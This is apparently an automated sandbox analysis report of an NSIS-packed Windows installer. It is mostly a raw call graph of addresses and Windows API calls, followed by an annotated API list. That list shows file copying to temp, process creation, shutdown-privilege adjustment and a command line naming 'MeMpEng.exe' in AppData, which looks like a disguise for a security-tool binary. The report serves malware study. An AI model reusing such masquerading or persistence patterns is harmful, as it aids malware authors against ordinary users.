40482e 5649 4048f8 5648->5649 5650 404838 GetDlgItem 5648->5650 5655 40453a 8 API calls 5649->5655 5651 404852 5650->5651 5652 4048b9 5650->5652 5651->5652 5658 404878 SendMessageW LoadCursorW SetCursor 5651->5658 5652->5649 5659 4048cb 5652->5659 5653->5648 5653->5649 5656 4047ff GetDlgItem SendMessageW 5653->5656 5657 404711 5654->5657 5669 4048f3 5655->5669 5679 4044f5 KiUserCallbackDispatcher 5656->5679 5661 4044d3 23 API calls 5657->5661 5680 404941 5658->5680 5663 4048e1 5659->5663 5664 4048d1 SendMessageW 5659->5664 5666 40471e CheckDlgButton 5661->5666 5663->5669 5670 4048e7 SendMessageW 5663->5670 5664->5663 5665 404829 5671 40491d SendMessageW 5665->5671 5677 4044f5 KiUserCallbackDispatcher 5666->5677 5670->5669 5671->5648 5672 40473c GetDlgItem 5678 404508 SendMessageW 5672->5678 5674 404752 SendMessageW 5675 404778 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5674->5675 5676 40476f GetSysColor 5674->5676 5675->5669 5676->5675 5677->5672 5678->5674 5679->5665 5683 405b7a ShellExecuteExW 5680->5683 5682 4048a7 LoadCursorW SetCursor 5682->5652 5683->5682 4390 401794 4391 402dcb 22 API calls 4390->4391 4392 40179b 4391->4392 4393 4017c3 4392->4393 4394 4017bb 4392->4394 4451 406554 lstrcpynW 4393->4451 4450 406554 lstrcpynW 4394->4450 4397 4017ce 4452 405e23 lstrlenW CharPrevW 4397->4452 4398 4017c1 4401 406802 5 API calls 4398->4401 4411 4017e0 4401->4411 4403 40181c 4458 40601f GetFileAttributesW 4403->4458 4406 4017f2 CompareFileTime 4406->4411 4407 4018b2 4408 4055d9 29 API calls 4407->4408 4410 4018bc 4408->4410 4409 4055d9 29 API calls 4419 40189e 4409->4419 4430 4032d9 4410->4430 4411->4403 4411->4406 4411->4407 4413 406554 lstrcpynW 4411->4413 4416 406591 22 API calls 4411->4416 4426 405bb4 MessageBoxIndirectW 4411->4426 4428 401889 4411->4428 4429 406044 GetFileAttributesW CreateFileW 4411->4429 4455 4068b1 FindFirstFileW 4411->4455 4413->4411 4415 4018e3 SetFileTime 4417 4018f5 CloseHandle 4415->4417 4416->4411 4418 401906 4417->4418 4417->4419 4420 40190b 4418->4420 4421 40191e 4418->4421 4422 406591 22 API calls 4420->4422 4423 406591 22 API calls 4421->4423 4424 401913 lstrcatW 4422->4424 4425 401926 4423->4425 4424->4425 4425->4419 4427 405bb4 MessageBoxIndirectW 4425->4427 4426->4411 4427->4419 4428->4409 4428->4419 4429->4411 4432 4032f2 4430->4432 4431 403320 4461 4034d1 4431->4461 4432->4431 4464 4034e7 SetFilePointer 4432->4464 4436 40346a 4438 4034ac 4436->4438 4443 40346e 4436->4443 4437 40333d GetTickCount 4439 4018cf 4437->4439 4446 403369 4437->4446 4440 4034d1 ReadFile 4438->4440 4439->4415 4439->4417 4440->4439 4441 4034d1 ReadFile 4441->4446 4442 4034d1 ReadFile 4442->4443 4443->4439 4443->4442 4444 4060f6 WriteFile 4443->4444 4444->4443 4445 4033bf GetTickCount 4445->4446 4446->4439 4446->4441 4446->4445 4447 4033e4 MulDiv wsprintfW 4446->4447 4449 4060f6 WriteFile 4446->4449 4448 4055d9 29 API calls 4447->4448 4448->4446 4449->4446 4450->4398 4451->4397 4453 4017d4 lstrcatW 4452->4453 4454 405e3f lstrcatW 4452->4454 4453->4398 4454->4453 4456 4068d2 4455->4456 4457 4068c7 FindClose 4455->4457 4456->4411 4457->4456 4459 406031 SetFileAttributesW 4458->4459 4460 40603e 4458->4460 4459->4460 4460->4411 4462 4060c7 ReadFile 4461->4462 4463 40332b 4462->4463 4463->4436 4463->4437 4463->4439 4464->4431 5684 401a97 5685 402da9 22 API calls 5684->5685 5686 401aa0 5685->5686 5687 402da9 22 API calls 5686->5687 5688 401a45 5687->5688 4480 405718 4481 4058c2 4480->4481 4482 405739 GetDlgItem GetDlgItem GetDlgItem 4480->4482 4484 4058f3 4481->4484 4485 4058cb GetDlgItem CreateThread CloseHandle 4481->4485 4526 404508 SendMessageW 4482->4526 4487 40591e 4484->4487 4488 405943 4484->4488 4489 40590a ShowWindow ShowWindow 4484->4489 4485->4484 4529 4056ac OleInitialize 4485->4529 4486 4057a9 4492 4057b0 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4486->4492 4490 40592a 4487->4490 4491 40597e 4487->4491 4496 40453a 8 API calls 4488->4496 4528 404508 SendMessageW 4489->4528 4494 405932 4490->4494 4495 405958 ShowWindow 4490->4495 4491->4488 4501 40598c SendMessageW 4491->4501 4499 405802 SendMessageW SendMessageW 4492->4499 4500 40581e 4492->4500 4502 4044ac SendMessageW 4494->4502 4497 405978 4495->4497 4498 40596a 4495->4498 4503 405951 4496->4503 4505 4044ac SendMessageW 4497->4505 4504 4055d9 29 API calls 4498->4504 4499->4500 4506 405831 4500->4506 4507 405823 SendMessageW 4500->4507 4501->4503 4508 4059a5 CreatePopupMenu 4501->4508 4502->4488 4504->4497 4505->4491 4510 4044d3 23 API calls 4506->4510 4507->4506 4509 406591 22 API calls 4508->4509 4511 4059b5 AppendMenuW 4509->4511 4512 405841 4510->4512 4513 4059d2 GetWindowRect 4511->4513 4514 4059e5 TrackPopupMenu 4511->4514 4515 40584a ShowWindow 4512->4515 4516 40587e GetDlgItem SendMessageW 4512->4516 4513->4514 4514->4503 4518 405a00 4514->4518 4519 405860 ShowWindow 4515->4519 4520 40586d 4515->4520 4516->4503 4517 4058a5 SendMessageW SendMessageW 4516->4517 4517->4503 4521 405a1c SendMessageW 4518->4521 4519->4520 4527 404508 SendMessageW 4520->4527 4521->4521 4523 405a39 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4521->4523 4524 405a5e SendMessageW 4523->4524 4524->4524 4525 405a87 GlobalUnlock SetClipboardData CloseClipboard 4524->4525 4525->4503 4526->4486 4527->4516 4528->4487 4530 40451f SendMessageW 4529->4530 4532 4056cf 4530->4532 4531 40451f SendMessageW 4533 405708 OleUninitialize 4531->4533 4534 401389 2 API calls 4532->4534 4535 4056f6 4532->4535 4534->4532 4535->4531 4536 401598 4537 4015b1 4536->4537 4538 4015a8 ShowWindow 4536->4538 4539 402c4f 4537->4539 4540 4015bf ShowWindow 4537->4540 4538->4537 4540->4539 4541 402419 4542 402dcb 22 API calls 4541->4542 4543 402428 4542->4543 4544 402dcb 22 API calls 4543->4544 4545 402431 4544->4545 4546 402dcb 22 API calls 4545->4546 4547 40243b GetPrivateProfileStringW 4546->4547 5689 404d1a 5690 404d46 5689->5690 5691 404d2a 5689->5691 5693 404d79 5690->5693 5694 404d4c SHGetPathFromIDListW 5690->5694 5700 405b98 GetDlgItemTextW 5691->5700 5696 404d63 SendMessageW 5694->5696 5697 404d5c 5694->5697 5695 404d37 SendMessageW 5695->5690 5696->5693 5698 40140b 2 API calls 5697->5698 5698->5696 5700->5695 5701 40201b 5702 402dcb 22 API calls 5701->5702 5703 402022 5702->5703 5704 4068b1 2 API calls 5703->5704 5705 402028 5704->5705 5706 402039 5705->5706 5708 40649b wsprintfW 5705->5708 5708->5706 5709 401b9c 5710 402dcb 22 API calls 5709->5710 5711 401ba3 5710->5711 5712 402da9 22 API calls 5711->5712 5713 401bac wsprintfW 5712->5713 5714 402c4f 5713->5714 5715 729f2d43 5716 729f2d5b 5715->5716 5717 729f162f 2 API calls 5716->5717 5718 729f2d76 5717->5718 5719 40149e 5720 4014ac PostQuitMessage 5719->5720 5721 4023c2 5719->5721 5720->5721 4552 729f2a7f 4553 729f2acf 4552->4553 4554 729f2a8f VirtualProtect 4552->4554 4554->4553 5722 4016a0 5723 402dcb 22 API calls 5722->5723 5724 4016a7 5723->5724 5725 402dcb 22 API calls 5724->5725 5726 4016b0 5725->5726 5727 402dcb 22 API calls 5726->5727 5728 4016b9 MoveFileW 5727->5728 5729 4016cc 5728->5729 5735 4016c5 5728->5735 5731 4068b1 2 API calls 5729->5731 5733 40231b 5729->5733 5730 401423 29 API calls 5730->5733 5732 4016db 5731->5732 5732->5733 5734 406314 41 API calls 5732->5734 5734->5735 5735->5730 5736 401a24 5737 402dcb 22 API calls 5736->5737 5738 401a2b 5737->5738 5739 402dcb 22 API calls 5738->5739 5740 401a34 5739->5740 5741 401a3b lstrcmpiW 5740->5741 5742 401a4d lstrcmpW 5740->5742 5743 401a41 5741->5743 5742->5743 5744 402324 5745 402dcb 22 API calls 5744->5745 5746 40232a 5745->5746 5747 402dcb 22 API calls 5746->5747 5748 402333 5747->5748 5749 402dcb 22 API calls 5748->5749 5750 40233c 5749->5750 5751 4068b1 2 API calls 5750->5751 5752 402345 5751->5752 5753 402356 lstrlenW lstrlenW 5752->5753 5757 402349 5752->5757 5755 4055d9 29 API calls 5753->5755 5754 4055d9 29 API calls 5758 402351 5754->5758 5756 402394 SHFileOperationW 5755->5756 5756->5757 5756->5758 5757->5754 5757->5758 5759 401da6 5760 401db9 GetDlgItem 5759->5760 5761 401dac 5759->5761 5762 401db3 5760->5762 5763 402da9 22 API calls 5761->5763 5764 401dfa GetClientRect LoadImageW SendMessageW 5762->5764 5765 402dcb 22 API calls 5762->5765 5763->5762 5767 401e58 5764->5767 5769 401e64 5764->5769 5765->5764 5768 401e5d DeleteObject 5767->5768 5767->5769 5768->5769 5770 729f1979 5771 729f199c 5770->5771 5772 729f19e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5771->5772 5773 729f19d1 GlobalFree 5771->5773 5774 729f1312 2 API calls 5772->5774 5773->5772 5775 729f1b6e GlobalFree GlobalFree 5774->5775 5776 4023a8 5777 4023af 5776->5777 5780 4023c2 5776->5780 5778 406591 22 API calls 5777->5778 5779 4023bc 5778->5779 5779->5780 5781 405bb4 MessageBoxIndirectW 5779->5781 5781->5780 5782 402c2a SendMessageW 5783 402c44 InvalidateRect 5782->5783 5784 402c4f 5782->5784 5783->5784 5785 729f1774 5786 729f17a3 5785->5786 5787 729f1bff 22 API calls 5786->5787 5788 729f17aa 5787->5788 5789 729f17bd 5788->5789 5790 729f17b1 5788->5790 5792 729f17c7 5789->5792 5793 729f17e4 5789->5793 5791 729f1312 2 API calls 5790->5791 5796 729f17bb 5791->5796 5797 729f15dd 3 API calls 5792->5797 5794 729f180e 5793->5794 5795 729f17ea 5793->5795 5799 729f15dd 3 API calls 5794->5799 5798 729f1654 3 API calls 5795->5798 5800 729f17cc 5797->5800 5801 729f17ef 5798->5801 5799->5796 5802 729f1654 3 API calls 5800->5802 5803 729f1312 2 API calls 5801->5803 5804 729f17d2 5802->5804 5805 729f17f5 GlobalFree 5803->5805 5806 729f1312 2 API calls 5804->5806 5805->5796 5808 729f1809 GlobalFree 5805->5808 5807 729f17d8 GlobalFree 5806->5807 5807->5796 5808->5796 4702 40352f SetErrorMode GetVersionExW 4703 403583 GetVersionExW 4702->4703 4704 4035bb 4702->4704 4703->4704 4705 403612 4704->4705 4706 406948 5 API calls 4704->4706 4707 4068d8 3 API calls 4705->4707 4706->4705 4708 403628 lstrlenA 4707->4708 4708->4705 4709 403638 4708->4709 4710 406948 5 API calls 4709->4710 4711 40363f 4710->4711 4712 406948 5 API calls 4711->4712 4713 403646 4712->4713 4714 406948 5 API calls 4713->4714 4715 403652 #17 OleInitialize SHGetFileInfoW 4714->4715 4790 406554 lstrcpynW 4715->4790 4718 4036a1 GetCommandLineW 4791 406554 lstrcpynW 4718->4791 4720 4036b3 4721 405e50 CharNextW 4720->4721 4722 4036d9 CharNextW 4721->4722 4730 4036eb 4722->4730 4723 4037ed 4724 403801 GetTempPathW 4723->4724 4792 4034fe 4724->4792 4726 403819 4727 403873 DeleteFileW 4726->4727 4728 40381d GetWindowsDirectoryW lstrcatW 4726->4728 4802 4030a2 GetTickCount GetModuleFileNameW 4727->4802 4731 4034fe 12 API calls 4728->4731 4729 405e50 CharNextW 4729->4730 4730->4723 4730->4729 4736 4037ef 4730->4736 4733 403839 4731->4733 4733->4727 4735 40383d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4733->4735 4734 403887 4737 40393e 4734->4737 4740 40392e 4734->4740 4744 405e50 CharNextW 4734->4744 4738 4034fe 12 API calls 4735->4738 4886 406554 lstrcpynW 4736->4886 4891 403b4c 4737->4891 4742 40386b 4738->4742 4830 403c26 4740->4830 4742->4727 4742->4737 4757 4038a6 4744->4757 4746 403ab0 4748 403b34 ExitProcess 4746->4748 4749 403ab8 GetCurrentProcess OpenProcessToken 4746->4749 4747 403a8c 4750 405bb4 MessageBoxIndirectW 4747->4750 4751 403ad0 LookupPrivilegeValueW AdjustTokenPrivileges 4749->4751 4752 403b04 4749->4752 4756 403a9a ExitProcess 4750->4756 4751->4752 4759 406948 5 API calls 4752->4759 4753 403904 4760 405f2b 18 API calls 4753->4760 4754 403947 4758 405b1f 5 API calls 4754->4758 4757->4753 4757->4754 4761 40394c lstrlenW 4758->4761 4762 403b0b 4759->4762 4763 403910 4760->4763 4889 406554 lstrcpynW 4761->4889 4765 403b20 ExitWindowsEx 4762->4765 4767 403b2d 4762->4767 4763->4737 4887 406554 lstrcpynW 4763->4887 4765->4748 4765->4767 4766 403966 4769 40397e 4766->4769 4890 406554 lstrcpynW 4766->4890 4770 40140b 2 API calls 4767->4770 4774 4039a4 wsprintfW 4769->4774 4782 4039d0 4769->4782 4770->4748 4771 403923 4888 406554 lstrcpynW 4771->4888 4775 406591 22 API calls 4774->4775 4775->4769 4776 405b02 2 API calls 4776->4782 4777 405aa8 2 API calls 4777->4782 4778 4039e0 GetFileAttributesW 4780 4039ec DeleteFileW 4778->4780 4778->4782 4779 403a1a SetCurrentDirectoryW 4781 406314 41 API calls 4779->4781 4780->4782 4783 403a29 CopyFileW 4781->4783 4782->4737 4782->4769 4782->4774 4782->4776 4782->4777 4782->4778 4782->4779 4784 405c60 72 API calls 4782->4784 4785 406314 41 API calls 4782->4785 4786 406591 22 API calls 4782->4786 4787 405b37 2 API calls 4782->4787 4788 403aa2 CloseHandle 4782->4788 4789 4068b1 2 API calls 4782->4789 4783->4737 4783->4782 4784->4782 4785->4782 4786->4782 4787->4782 4788->4737 4789->4782 4790->4718 4791->4720 4793 406802 5 API calls 4792->4793 4794 40350a 4793->4794 4795 403514 4794->4795 4796 405e23 3 API calls 4794->4796 4795->4726 4797 40351c 4796->4797 4798 405b02 2 API calls 4797->4798 4799 403522 4798->4799 4800 406073 2 API calls 4799->4800 4801 40352d 4800->4801 4801->4726 4898 406044 GetFileAttributesW CreateFileW 4802->4898 4804 4030e2 4805 4030f2 4804->4805 4899 406554 lstrcpynW 4804->4899 4805->4734 4807 403108 4808 405e6f 2 API calls 4807->4808 4809 40310e 4808->4809 4900 406554 lstrcpynW 4809->4900 4811 403119 GetFileSize 4812 403130 4811->4812 4827 403213 4811->4827 4812->4805 4814 4034d1 ReadFile 4812->4814 4818 40327f 4812->4818 4826 40303e 6 API calls 4812->4826 4812->4827 4814->4812 4815 40321c 4815->4805 4816 40324c GlobalAlloc 4815->4816 4913 4034e7 SetFilePointer 4815->4913 4912 4034e7 SetFilePointer 4816->4912 4820 40303e 6 API calls 4818->4820 4820->4805 4821 403235 4823 4034d1 ReadFile 4821->4823 4822 403267 4824 4032d9 36 API calls 4822->4824 4825 403240 4823->4825 4828 403273 4824->4828 4825->4805 4825->4816 4826->4812 4901 40303e 4827->4901 4828->4805 4828->4828 4829 4032b0 SetFilePointer 4828->4829 4829->4805 4831 406948 5 API calls 4830->4831 4832 403c3a 4831->4832 4833 403c40 4832->4833 4834 403c52 4832->4834 4922 40649b wsprintfW 4833->4922 4835 406422 3 API calls 4834->4835 4836 403c82 4835->4836 4838 403ca1 lstrcatW 4836->4838 4839 406422 3 API calls 4836->4839 4840 403c50 4838->4840 4839->4838 4914 403efc 4840->4914 4843 405f2b 18 API calls 4844 403cd3 4843->4844 4845 403d67 4844->4845 4847 406422 3 API calls 4844->4847 4846 405f2b 18 API calls 4845->4846 4848 403d6d 4846->4848 4856 403d05 4847->4856 4849 403d7d LoadImageW 4848->4849 4850 406591 22 API calls 4848->4850 4851 403e23 4849->4851 4852 403da4 RegisterClassW 4849->4852 4850->4849 4854 40140b 2 API calls 4851->4854 4853 403dda SystemParametersInfoW CreateWindowExW 4852->4853 4885 403e2d 4852->4885 4853->4851 4859 403e29 4854->4859 4855 403d26 lstrlenW 4857 403d34 lstrcmpiW 4855->4857 4858 403d5a 4855->4858 4856->4845 4856->4855 4860 405e50 CharNextW 4856->4860 4857->4858 4861 403d44 GetFileAttributesW 4857->4861 4862 405e23 3 API calls 4858->4862 4865 403efc 23 API calls 4859->4865 4859->4885 4863 403d23 4860->4863 4864 403d50 4861->4864 4866 403d60 4862->4866 4863->4855 4864->4858 4867 405e6f 2 API calls 4864->4867 4868 403e3a 4865->4868 4923 406554 lstrcpynW 4866->4923 4867->4858 4870 403e46 ShowWindow 4868->4870 4871 403ec9 4868->4871 4873 4068d8 3 API calls 4870->4873 4872 4056ac 5 API calls 4871->4872 4874 403ecf 4872->4874 4875 403e5e 4873->4875 4876 403ed3 4874->4876 4877 403eeb 4874->4877 4878 403e6c GetClassInfoW 4875->4878 4880 4068d8 3 API calls 4875->4880 4884 40140b 2 API calls 4876->4884 4876->4885 4879 40140b 2 API calls 4877->4879 4881 403e80 GetClassInfoW RegisterClassW 4878->4881 4882 403e96 DialogBoxParamW 4878->4882 4879->4885 4880->4878 4881->4882 4883 40140b 2 API calls 4882->4883 4883->4885 4884->4885 4885->4737 4886->4724 4887->4771 4888->4740 4889->4766 4890->4769 4892 403b64 4891->4892 4893 403b56 CloseHandle 4891->4893 4925 403b91 4892->4925 4893->4892 4896 405c60 72 API calls 4897 403a7f OleUninitialize 4896->4897 4897->4746 4897->4747 4898->4804 4899->4807 4900->4811 4902 403047 4901->4902 4903 40305f 4901->4903 4906 403050 DestroyWindow 4902->4906 4907 403057 4902->4907 4904 403067 4903->4904 4905 40306f GetTickCount 4903->4905 4908 406984 2 API calls 4904->4908 4909 4030a0 4905->4909 4910 40307d CreateDialogParamW ShowWindow 4905->4910 4906->4907 4907->4815 4911 40306d 4908->4911 4909->4815 4910->4909 4911->4815 4912->4822 4913->4821 4915 403f10 4914->4915 4924 40649b wsprintfW 4915->4924 4917 403f81 4918 403fb5 23 API calls 4917->4918 4920 403f86 4918->4920 4919 403cb1 4919->4843 4920->4919 4921 406591 22 API calls 4920->4921 4921->4920 4922->4840 4923->4845 4924->4917 4926 403b9f 4925->4926 4927 403b69 4926->4927 4928 403ba4 FreeLibrary GlobalFree 4926->4928 4927->4896 4928->4927 4928->4928 4929 4024af 4930 402dcb 22 API calls 4929->4930 4931 4024c1 4930->4931 4932 402dcb 22 API calls 4931->4932 4933 4024cb 4932->4933 4946 402e5b 4933->4946 4936 402dcb 22 API calls 4941 4024f9 lstrlenW 4936->4941 4937 402503 4938 40250f 4937->4938 4942 402da9 22 API calls 4937->4942 4940 40252e RegSetValueExW 4938->4940 4943 4032d9 36 API calls 4938->4943 4939 402c4f 4944 402544 RegCloseKey 4940->4944 4941->4937 4942->4938 4943->4940 4944->4939 4947 402e76 4946->4947 4950 4063ef 4947->4950 4951 4063fe 4950->4951 4952 4024db 4951->4952 4953 406409 RegCreateKeyExW 4951->4953 4952->4936 4952->4937 4952->4939 4953->4952 4954 402930 4955 402dcb 22 API calls 4954->4955 4956 402937 FindFirstFileW 4955->4956 4957 40294a 4956->4957 4958 40295f 4956->4958 4959 402968 4958->4959 4962 40649b wsprintfW 4958->4962 4963 406554 lstrcpynW 4959->4963 4962->4959 4963->4957 5809 401931 5810 401968 5809->5810 5811 402dcb 22 API calls 5810->5811 5812 40196d 5811->5812 5813 405c60 72 API calls 5812->5813 5814 401976 5813->5814 5815 401934 5816 402dcb 22 API calls 5815->5816 5817 40193b 5816->5817 5818 405bb4 MessageBoxIndirectW 5817->5818 5819 401944 5818->5819 4964 4028b6 4965 4028bd 4964->4965 4968 402bce 4964->4968 4966 402da9 22 API calls 4965->4966 4967 4028c4 4966->4967 4969 4028d3 SetFilePointer 4967->4969 4969->4968 4970 4028e3 4969->4970 4972 40649b wsprintfW 4970->4972 4972->4968 5820 729f23e9 5821 729f2453 5820->5821 5822 729f245e GlobalAlloc 5821->5822 5823 729f247d 5821->5823 5822->5821 5824 401f37 5825 402dcb 22 API calls 5824->5825 5826 401f3d 5825->5826 5827 402dcb 22 API calls 5826->5827 5828 401f46 5827->5828 5829 402dcb 22 API calls 5828->5829 5830 401f4f 5829->5830 5831 402dcb 22 API calls 5830->5831 5832 401f58 5831->5832 5833 401423 29 API calls 5832->5833 5834 401f5f 5833->5834 5841 405b7a ShellExecuteExW 5834->5841 5836 401fa7 5837 402953 5836->5837 5838 4069f3 5 API calls 5836->5838 5839 401fc4 CloseHandle 5838->5839 5839->5837 5841->5836 5842 4014b8 5843 4014be 5842->5843 5844 401389 2 API calls 5843->5844 5845 4014c6 5844->5845 5846 402fb8 5847 402fe3 5846->5847 5848 402fca SetTimer 5846->5848 5849 403038 5847->5849 5850 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5847->5850 5848->5847 5850->5849 5851 401d3c 5852 402da9 22 API calls 5851->5852 5853 401d42 IsWindow 5852->5853 5854 401a45 5853->5854 5855 729f10e1 5857 729f1111 5855->5857 5856 729f12b0 GlobalFree 5857->5856 5858 729f1240 GlobalFree 5857->5858 5859 729f11d7 GlobalAlloc 5857->5859 5860 729f12ab 5857->5860 5861 729f135a 2 API calls 5857->5861 5862 729f1312 2 API calls 5857->5862 5863 729f129a GlobalFree 5857->5863 5864 729f116b GlobalAlloc 5857->5864 5865 729f1381 lstrcpyW 5857->5865 5858->5857 5859->5857 5860->5856 5861->5857 5862->5857 5863->5857 5864->5857 5865->5857

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 40352f-403581 SetErrorMode GetVersionExW 1 403583-4035b3 GetVersionExW 0->1 2 4035bb-4035c0 0->2 1->2 3 4035c2 2->3 4 4035c8-40360a 2->4 3->4 5 40360c-403614 call 406948 4->5 6 40361d 4->6 5->6 12 403616 5->12 7 403622-403636 call 4068d8 lstrlenA 6->7 13 403638-403654 call 406948 * 3 7->13 12->6 20 403665-4036c9 #17 OleInitialize SHGetFileInfoW call 406554 GetCommandLineW call 406554 13->20 21 403656-40365c 13->21 28 4036d2-4036e6 call 405e50 CharNextW 20->28 29 4036cb-4036cd 20->29 21->20 26 40365e 21->26 26->20 32 4037e1-4037e7 28->32 29->28 33 4036eb-4036f1 32->33 34 4037ed 32->34 35 4036f3-4036f8 33->35 36 4036fa-403701 33->36 37 403801-40381b GetTempPathW call 4034fe 34->37 35->35 35->36 39 403703-403708 36->39 40 403709-40370d 36->40 44 403873-40388d DeleteFileW call 4030a2 37->44 45 40381d-40383b GetWindowsDirectoryW lstrcatW call 4034fe 37->45 39->40 42 403713-403719 40->42 43 4037ce-4037dd call 405e50 40->43 47 403733-40376c 42->47 48 40371b-403722 42->48 43->32 61 4037df-4037e0 43->61 66 403893-403899 44->66 67 403a7a-403a8a call 403b4c OleUninitialize 44->67 45->44 64 40383d-40386d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 4034fe 45->64 49 403789-4037c3 47->49 50 40376e-403773 47->50 54 403724-403727 48->54 55 403729 48->55 58 4037c5-4037c9 49->58 59 4037cb-4037cd 49->59 50->49 56 403775-40377d 50->56 54->47 54->55 55->47 62 403784 56->62 63 40377f-403782 56->63 58->59 65 4037ef-4037fc call 406554 58->65 59->43 61->32 62->49 63->49 63->62 64->44 64->67 65->37 70 403932-403939 call 403c26 66->70 71 40389f-4038aa call 405e50 66->71 78 403ab0-403ab6 67->78 79 403a8c-403a9c call 405bb4 ExitProcess 67->79 77 40393e-403942 70->77 81 4038f8-403902 71->81 82 4038ac-4038e1 71->82 77->67 83 403b34-403b3c 78->83 84 403ab8-403ace GetCurrentProcess OpenProcessToken 78->84 89 403904-403912 call 405f2b 81->89 90 403947-40396d call 405b1f lstrlenW call 406554 81->90 86 4038e3-4038e7 82->86 91 403b42-403b46 ExitProcess 83->91 92 403b3e 83->92 87 403ad0-403afe LookupPrivilegeValueW AdjustTokenPrivileges 84->87 88 403b04-403b12 call 406948 84->88 94 4038f0-4038f4 86->94 95 4038e9-4038ee 86->95 87->88 104 403b20-403b2b ExitWindowsEx 88->104 105 403b14-403b1e 88->105 89->67 106 403918-40392e call 406554 * 2 89->106 110 40397e-403996 90->110 111 40396f-403979 call 406554 90->111 92->91 94->86 99 4038f6 94->99 95->94 95->99 99->81 104->83 108 403b2d-403b2f call 40140b 104->108 105->104 105->108 106->70 108->83 116 40399b-40399f 110->116 111->110 118 4039a4-4039ce wsprintfW call 406591 116->118 122 4039d0-4039d5 call 405aa8 118->122 123 4039d7 call 405b02 118->123 126 4039dc-4039de 122->126 123->126 128 4039e0-4039ea GetFileAttributesW 126->128 129 403a1a-403a39 SetCurrentDirectoryW call 406314 CopyFileW 126->129 130 403a0b-403a16 128->130 131 4039ec-4039f5 DeleteFileW 128->131 137 403a78 129->137 138 403a3b-403a5c call 406314 call 406591 call 405b37 129->138 130->116 134 403a18 130->134 131->130 133 4039f7-403a09 call 405c60 131->133 133->118 133->130 134->67 137->67 146 403aa2-403aae CloseHandle 138->146 147 403a5e-403a68 138->147 146->137 147->137 148 403a6a-403a72 call 4068b1 147->148 148->118 148->137
                                                          APIs
                                                          • SetErrorMode.KERNELBASE ref: 00403552
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040357D
                                                          • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00403590
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403629
                                                          • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403666
                                                          • OleInitialize.OLE32(00000000), ref: 0040366D
                                                          • SHGetFileInfoW.SHELL32(0079F708,00000000,?,000002B4,00000000), ref: 0040368C
                                                          • GetCommandLineW.KERNEL32(007A7260,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036A1
                                                          • CharNextW.USER32(00000000), ref: 004036DA
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403812
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403823
                                                          • lstrcatW.KERNEL32 ref: 0040382F
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403843
                                                          • lstrcatW.KERNEL32 ref: 0040384B
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040385C
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403864
                                                          • DeleteFileW.KERNEL32(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403878
                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\MeMpEng.exe" ,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403951
                                                            • Part of subcall function 00406554: lstrcpynW.KERNEL32(?,?,00000400,004036A1,007A7260,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406561
                                                          • wsprintfW.USER32 ref: 004039AE
                                                          • GetFileAttributesW.KERNEL32(456,C:\Users\user\AppData\Local\Temp\), ref: 004039E1
                                                          • DeleteFileW.KERNEL32(456), ref: 004039ED
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403A1B
                                                            • Part of subcall function 00406314: MoveFileExW.KERNEL32(?,?,00000005), ref: 0040631E
                                                          • CopyFileW.KERNEL32 ref: 00403A31
                                                            • Part of subcall function 00405B37: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4750,?), ref: 00405B60
                                                            • Part of subcall function 00405B37: CloseHandle.KERNEL32(?), ref: 00405B6D
                                                            • Part of subcall function 004068B1: FindFirstFileW.KERNELBASE(7570D4C4,007A4798,007A3F50,00405F74,007A3F50,007A3F50,00000000,007A3F50,007A3F50,7570D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C80,?,7570D4C4,C:\Users\user\AppData\Local\Temp\), ref: 004068BC
                                                            • Part of subcall function 004068B1: FindClose.KERNEL32(00000000), ref: 004068C8
                                                          • OleUninitialize.OLE32 ref: 00403A7F
                                                          • ExitProcess.KERNEL32 ref: 00403A9C
                                                          • CloseHandle.KERNEL32(00000000), ref: 00403AA3
                                                          • GetCurrentProcess.KERNEL32(00000028,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403ABF
                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?), ref: 00403AC6
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403ADB
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00403AFE
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403B23
                                                          • ExitProcess.KERNEL32 ref: 00403B46
